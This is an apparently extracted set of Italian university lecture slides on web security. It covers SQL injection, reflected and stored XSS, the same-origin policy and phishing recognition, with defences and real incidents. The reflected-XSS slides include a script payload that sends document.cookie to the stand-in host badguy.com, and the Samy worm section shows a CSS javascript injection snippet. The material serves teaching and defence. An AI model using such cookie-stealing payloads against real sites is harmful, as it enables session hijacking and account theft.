27/11/12. Elementi di Sicurezza e Privatezza Lezione 11 Web Security (3) - Code Injection. Chiara Braghin. chiara.braghin@unimi.it!

Transcript

1 Elementi di Sicurezza e Privatezza Lezione 11 Web Security (3) - Code Injection Chiara Braghin chiara.braghin@unimi.it! SQL Injection 1

2 SQL Injection - Funzionamento di base 1 Inserire input malizioso in un form Server Vittima 2 Attaccante 3 riceve (o modifica) dati sensibili query SQL non voluta DB SQL Vittima 2 Attacco a CardSystems CardSystems w Una compagnia che gestiva il pagamento avvenuto tramite carte di credito w Attacco SQL injection nel giugno 2005 L attacco in numeri: w 263,000 numeri di carte di credito rubati dal database (i numeri venivano memorizzati in chiaro ) w 43 milioni di numeri di carte di credito esposti all attacco 3 2

3 Attacco dell aprile 2008 (1) 4 Attacco dell aprile 2008 (2) Come ha funzionato l attacco: w (1) Usato Google per trovare siti che usano un particolare stile di ASP vulnerabile ad attacchi di tipo SQL injection w (2) Usato SQL injection su questi siti, modificando la pagina restituita dal server facendo in modo che includesse un link al sito cinese nihaorr1.com (NON VISITARE IL SITO!!!!!) w (3) Il sito nihaorr1.com usa script JavaScript che sfruttano vulnerabilità in IE, RealPlayer, QQ Instant Messenger I passi (1) e (2) sono eseguiti in automatico da un tool che può venire configurato in modo che inietti qullo che si vuole nei siti vulnerabili 5 3

4 Esistono delle soluzioni? 1. Whitelisting al posto di Blacklisting 2. Validazione dell input 3. Usare Prepared Statements 6 Problemi del Blacklisting Blacklisting: indicare i caratteri che non devono essere presenti nelle stringhe di input Filtrare apici, spazi bianchi, punto e virgola e? w Si potrebbe sempre scordare un carattere pericoloso w Blacklisting non è una soluzione esauriente w Es: parametri numerici? Può essere in conflitto con alcuni requisiti funzionali: w Come memorizzare O Brien nel DB se gli apici non sono permessi? 7 4

5 Whitelisting Whitelisting: permettere solo input che rientrano in un ben definito insieme di valori w L insieme di valori in genere viene definito usando espressioni regolari w RegExp è il pattern con cui confrontare le stringhe in ingresso Es: il parametro month deve essere un intero nonnegativo w RegExp: ^[0-9]*$ - 0 o più cifre, insieme sicuro ^ e $ indicano l inizio e la fine della stringa [0-9] indica cifre, * indica 0 o più 8 Prepared Statements & Bind Variables Meccanismo di base per SQL Injection: Alcuni metacaratteri (e.g. apici) servono per distinguere i dati dal controllo nelle query w Nella maggior parte degli attacchi: dati interpretati come controllo, alterando la semantica della query Bind Variable:? segnaposto che garantiscono si tratti di dati (non di controllo) Prepared Statements permettono la creazione di query statiche con bind variable w Preserva la struttura della query attesa w I parametri non vengono considerati in fase di parsing della query 9 5

6 Java Prepared Statements PreparedStatement ps = db.preparestatement("select pizza, toppings, quantity, order_day " + "FROM orders WHERE userid=? AND order_month=?"); ps.setint(1, session.getcurrentuserid()); ps.setint(2, Integer.parseInt(request.getParamenter("month"))); ResultSet res = ps.executequery(); Bind Variable: segnaposto per i dati Le bind variable sono tipate: l input deve essere del tipo che ci si aspetta (e.g. int, string) 10 PHP Prepared Statements $ps = $db->prepare( 'SELECT pizza, toppings, quantity, order_day '. 'FROM orders WHERE userid=? AND order_month=?'); $ps->execute(array($current_user_id, $month)); Bind Variable: segnaposto per i dati Non c è la tipizzazione dei parametri come in Java!!!! SQL injection è ancora possibile! 11 6

7 Conclusione Gli attacchi di tipo SQL injection sono delle minacce che possono: w Rilasciare dati sensibili w Alterare o danneggiare dati critici w Dare ad un attaccante un accesso non autorizzato ad un DB Idea chiave per combatterli: usare diverse soluzioni, in modo consistente! w Validazione dell input basato su whitelisting w Prepared Statements con bind variable (meglio se tipate) 12 XSS Cross Site Scripting 7

8 Cosa è XSS? (1) Forma di attacco in cui l attaccante è in grado di eseguire del codice arbitrario (script) nella pagina Web visualizzata da un altro utente Compromette il client, non il server 14 Cosa è XSS? (2) Obiettivi dell attacco: w Rubare cookie di sessione w Eseguire azioni (anche in modo implicito) per le quali solo l utente attaccato ha i privilegi w Visualizzare contenuti falsi o modificati w Diffondere l attacco postando il codice nella pagina di un social network, facendo in modo che tutti gli amici dell utente vengano infettati 15 8

9 Cosa è XSS? (3) Un attacco XSS inserisce uno script (script injection) nella(e) pagina(e) generata(e) da un server Web Metodi per inserire lo script : w Reflected XSS ( tipo 1, detto anche non persistente) L utente che subisce l attacco segue un link malizioso che lo rimanda ad un server vulnerabile che scrive l attacco XSS nella risposta Il contenuto della pagina spedita come risposta dal server viene modificato in modo non permanente ed esclusivamente per le richieste HTTP che utilizzano tale URL appositamente forgiato Lo script, contenuto in qualche modo nel link malizioso, viene spedito all utente come parte di una pagina del server vulnerabile w Stored XSS ( tipo 2, detto anche persistente) L attaccante salva il codice malizioso tra le risorse gestite dal server Web vulnerabile (per esempio un DB), ad esempio inserendolo come commento Il contenuto della pagina viene modificato permanentemente, quindi tutti gli utenti che successivamente accedono al sito Web gestito da tale server sono potenzialmente attaccabili 16 Come inserire lo script? Form URL Feed RSS, sistemi integrati, ecc. 17 9

10 Reflected XSS - esempio (1) Supponiamo che sul sito victim.com ci sia un campo di ricerca: w term = apple E che search.php a lato server crei la pagina: <HTML><TITLE>Risultati della ricerca</title>! <BODY>! Risultati per <?php echo $_GET[term]?> :!...! </BODY>! </HTML>! 18 Reflected XSS - esempio (2) Si consideri il seguente URL (generato dall attaccante badguy.com): term =!!!<script> window.open(!!! = +!!!!document.cookie ) </script> Cosa succede se l utente fa click sul link? w Il browser va a victim.com/search.php w Victim.com ritorna la seguente pagina: <HTML> Risultati per <script> </script> w Il browser esegue lo script: Spedisce a badguy.com i cookie dell utente 19 10

11 Reflected XSS - esempio (3) Attaccante 1. L utente riceve il link cattivo term = <script>... </script> 2. L utente fa click sul link Client vittima 3. Il server vittima rimanda indietro senza verificarlo l input dell utente <html> Risultati per <script> window.open( document.cookie...) </script> </html> Server Vittima 20 Reflected XSS - in generale (1) 1 4 Script injection Durante l esecuzione dello script, spedisce dati confidenziali Attaccante Client vittima 3 2 Riflette l input indietro all utente senza verificarlo Spedisce (inconsapevolmente) lo script Server Vittima 21 11

12 Reflected XSS - in generale (2) Possibile quando un server Web è dinamico e genera una pagina utilizzando dati inseriti dal client mediante i parametri della richiesta HTTP o di un form, senza verificarli In questo caso il server si dice XSS vulnerable 22 Reflected XSS - in generale (3) 1. Alice spesso visita il sito di Bob, che è un server XSS vulnerable e ha i privilegi per memorizzare i dati sensibili di Alice 2. Eve osserva quanto sopra, crea un URL che sfrutta tale vulnerabilità e spedisce ad Alice una mail con l URL (che punta al sito di Bob, ma contiene uno script malizioso ) 3. Alice visita l URL e lo script di Eve viene eseguito dal browser di Alice, come se venisse direttamente da Bob 23 12

13 Same-origin policy dei browser (1) Detta anche cross-domain security policy Introdotta da Netscape Navigator 2.0 Limita l interazione tra pagine Web che provengono da domini diversi w Gli script possono accedere solo alle proprietà (cookie, oggetti DOM) di documenti che hanno la stessa origine w NB1: i link, i frame, le immagini, i fogli di stile e gli script possono appartenere e provenire da domini diversi 24 Same-origin policy dei browser (2) Origin: protocol, hostname, port, ma non il path Same Origin w w w stesso protocollo: http, host: examplesite, default port 80 All Different Origins w w w w w Protocollo diverso: http vs. https, porte diverse: 80 vs. 8080, host diversi: examplesite vs. hackerhome 25 13

14 Same-origin policy dei browser (3) Con l attacco XSS viene bypassata la same-origin policy! 26 Esempio: attacco a PayPal Attacco del 2006: w Gli utenti vengono contattati via e gli viene richiesto di accedere ad un URL che si trova sul sito (legittimo) di PayPal w Del codice iniettato nell URL ridireziona i visitatori ad una pagina che comunica loro che i loro account sono stati compromessi w Le vittime vengono quindi redirette ad un sito (non legittimo!!) dove veniva loro chiesto di inserire i loro dati sensibili Riferimento:

15 Stored XSS - in generale (1) Attaccante Client vittima Rilascio di dati confidenziali Richiesta di una pagina 1 Inserimento dello script malizioso Riceve lo script malizioso Server Vittima 28 Stored XSS - in generale (2) Possibile grazie a siti con online message board dove gli utenti possono inserire messaggi formattati in HTML Scenario: 1. Eve posta in un social network un messaggio con un corpo malizioso 2. Quando Bob legge il messaggio, lo script malizioso legge il cookie di Bob e lo spedisce a Eve 3. Eve ora può impersonare Bob 29 15

16 Stored XSS - esempio (1) Attacco a MySpace.com (il Worm Samy) w Gli utenti possono postare codice HTML nelle loro pagine w MySpace.com verifica che l HTML non contenga <script>, <body>, onclick, <a href=javascript://> w ma Javascript nei tag CSS è permesso: <div style= background:url( javascript:alert(1) ) > Con un attento Javascript hacking: w Il worm Samy infetta chiunque visiti una pagina di MySpace infettata, e aggiunge Samy come amico w In 24 ore Samy aveva milioni di amici!! 30 Stored XSS - esempio (2) Stored XSS tramite immagini w Si supponga che il file foto.jpg contenga HTML La richiesta ha come risposta: HTTP/ OK!! Content-Type: image/jpeg! <html> scherzetto! </html>! Il browser visualizzerà la risposta come HTML, non curante del Content-Type w Si supponga che esista un sito di condivisione foto che permette di scaricare le immagini..cosa succede se un utente scarica un immagine che è uno script? 31 16

17 XSS: Come difendersi? A lato server: w Analizzare i dati in input e "depurare" i parametri in ingresso degli elementi potenzialmente nocivi (i.e., tag HTML, apici, simboli utilizzati dal linguaggio di programmazione, ) A lato client: w Mantenere aggiornati i browser, le ultime versioni includono un filtro per questo tipo di attacchi w Firefox: Content Security Policy 32 Phishing 17

18 Phishing Attività illegale che pesca utenti in rete e li porta a visitare un sito Web malizioso che recupera a loro insaputa informazioni personali o riservate Obiettivo: w Recuperare le credenziali di accesso usate per il servizio di homebanking che la maggior parte delle banche/istituti di credito mettono a disposizione dei propri clienti w Trasferimento illecito di soldi (ovviamente all insaputa della vittima) 34 Funzionamento Le vittime vengono indotte ad inserire i propri dati in un sito Web che simula graficamente quello ufficiale I dati inseriti vengo memorizzati ed usati dall attaccante per avere accesso al vero sito come un normale cliente 35 18

19 Come pescare le vittime? (1) Delle mail fasulle inducono la vittima a visitare il finto sito: w La mail contiene quasi sempre avvisi di particolari situazioni o problemi che richiedono l accesso alla parte del sito autenticata (un addebito enorme, la scadenza dell'account, ecc.) Il link presente nella mail indirizza l utente al sito di phishing e non al sito ufficiale 36 Come pescare le vittime? @ 1. L attaccante invia a migliaia di indirizzi internet una mail spacciandosi per un istituto bancario Gentile utente, per motivi di sicurezza la invitiamo al più presto a controllare il proprio account personale L utente riceve la mail dove gli viene chiesto di cliccare su di un link ed inserire i propri codici d accesso ATTACCANTE 3. I codici inseriti arrivano direttamente all attacante che li userà per i suoi scopi illeciti 37 19

20 Come riconoscere l attacco? (1) Alcune parti della mail, se osservate con attenzione, possono segnalare che si tratta di una comunicazione anomala : w indirizzo del mittente del messaggio w italiano stentato: errori ortografici, di sintassi o di coniugazione verbi, in quanto generata da un traduttore automatico w link ad una pagina esterna w segnalazioni di blocco del conto, minacce di chiusura del conto o di servizi, piuttosto che segnalazioni di vittorie o premi a patto che si inseriscano i codici personali 38 Come riconoscere l attacco? (2) Mittente fasullo Il mittente rapport@sanpaolo.com è un indirizzo sospetto che una banca difficilmente utilizzerebbe per le sue comunicazioni ufficiali 39 20

21 Come riconoscere l attacco? (3) Italiano zoppicante: Gentile Cliente, Gruppo Poste spa premia il suo account con un bonus di fedeltã. Per ricevere il bonus à necesario accedere ai servizi online entro 48 ore dalla ricezione di questa . Importo bonus vinto: euro 250,00; Commissioni: euro 1,00; Importo totale: euro 251,00 Accedi ai servizi online per accreditare il bonus fedeltã. Per ulteriori informazioni consulta il sito web. La ringraziamo per aver scelto i nostri servizi. Distinti Saluti Gruppo Poste spa 40 Come riconoscere l attacco? (4) Il testo del link (1) non coincide con il vero URL Infatti il browser verrà indirizzato ad un IP (2) che corrisponde al sito fasullo 41 21

22 Come difendersi? (1) Analizzare il codice sorgente della mail <<! X-Account-Key: account2 X-UIDL: X-Mozilla-Status: 0001 X-Mozilla-Status2: Return-Path: Received: from vsmtp20.tin.it ( ) by ims3a.cp.tin.it ( ) id 4421EA10006D86D2 for Wed, 15 Apr :19: Received: from mail.luanett.com.br ( ) by vsmtp20.tin.it ( ) id 4405C7C102F5CF4A for Wed, 5 Apr :18: Message-ID: <4405C7C102F5CF4A@vsmtp20.tin.it> (added by postmaster@virgilio.it) Received: (qmail invoked by uid 1020); 4 Apr :18: Received: from by cometa (envelope-from <rapport@sanpaolo.com>, uid 89) with qmail-scanner-1.24-st-qms (clamdscan: 0.80/633. spamassassin: perlscan: 1.24-st-qms. Clear:RC:0( ):SA:0(4.7/5.0):. Processed in secs); 05 Apr :18: X-Spam-Status: No, hits=4.7 required=5.0 X-Spam-Level: ++++ X-Antivirus-Luanett-Mail-From: rapport@sanpaolo.com via cometa X-Antivirus-Luanett: 1.24-st-qms (Clear:RC:0( ):SA:0(4.7/5.0):. Processed in secs Process 27729) Received: from user-ip sel.rdsnav.ro (HELO service) (service@ ) by mail.luanett.com.br with SMTP; 4 Apr :18: Reply-To: <no0reply@sanpaolo.com> From: "Banca San Paolo IMI"<rapport@sanpaolo.com> Subject: Important Circa Il *** Imminente Di Cliente Di Bank Della Squadra Del Internet Date: Wed, 5 Apr :18: MIME-Version: 1.0 >>! 42 Come difendersi? (2) Received: from ! Utilizzando uno dei siti che mettono a disposizione il servizio WHO IS è possibile ottenere maggiori informazioni sull indirizzo IP di partenza. In questo caso risulta che l host sia in Romania E sicuramente una buona ragione per dubitare che la provenienza della mail sia la Banca San Paolo

23 Esempio (1) 44 Esempio (2) 45 23

24 Esempio (3) L URL del sito inizia con HTTP invece che con HTTPS Molto strano che un sito cosi importante utilizzi protocolli non sicuri per l autenticazione degli utenti! 46 Esempio (4) 47 24

25 Statistiche (1) 48 Statistiche (2) 49 25

26 Statistiche (3) 50 Statistiche (4) I più bersagliati sono i clienti di Poste Italiane e di Intesa S. Paolo, seguiti da quelli di Cartasì, ma non mancano i soliti ebay e PayPal In tutti i casi esaminati i siti di phishing sono praticamente indistinguibili dall originale, se non per qualche dettaglio 51 26